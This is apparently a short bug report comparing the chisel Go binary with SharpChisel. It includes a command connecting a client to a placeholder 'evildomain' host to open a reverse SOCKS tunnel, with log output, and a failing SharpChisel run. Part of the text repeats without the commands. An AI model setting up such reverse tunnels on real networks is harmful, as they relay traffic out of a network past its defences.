I was able to us the Go binary:
C:\temp\> chisel.exe client --auth user:pass https://evildomain R:socks
2020/10/29 13:06:01 client: Connecting to wss://evildomain:443
2020/10/29 13:06:01 client: Fingerprint SNIPPED
2020/10/29 13:06:01 client: Connected (Latency 62.3573ms)
But with SharpChisel I get this:
SharpChisel.exe client --auth user:pass https://evildomain R:socks
[client --auth user:pass https://evildomain R:1080:socks]
2020/10/29 13:06:43 client: Connecting to wss://evildomain:443
2020/10/29 13:06:44 client: Fingerprint SNIPPED
2020/10/29 13:06:44 client: server: Server cannot listen on R:127.0.0.1:1080=>socks
I restarted the server both times just to make sure there wasn't lingering connections. Both runs are from the same machine. Not sure what's going wrong here.
I was able to us the Go binary:
But with SharpChisel I get this:
I restarted the server both times just to make sure there wasn't lingering connections. Both runs are from the same machine. Not sure what's going wrong here.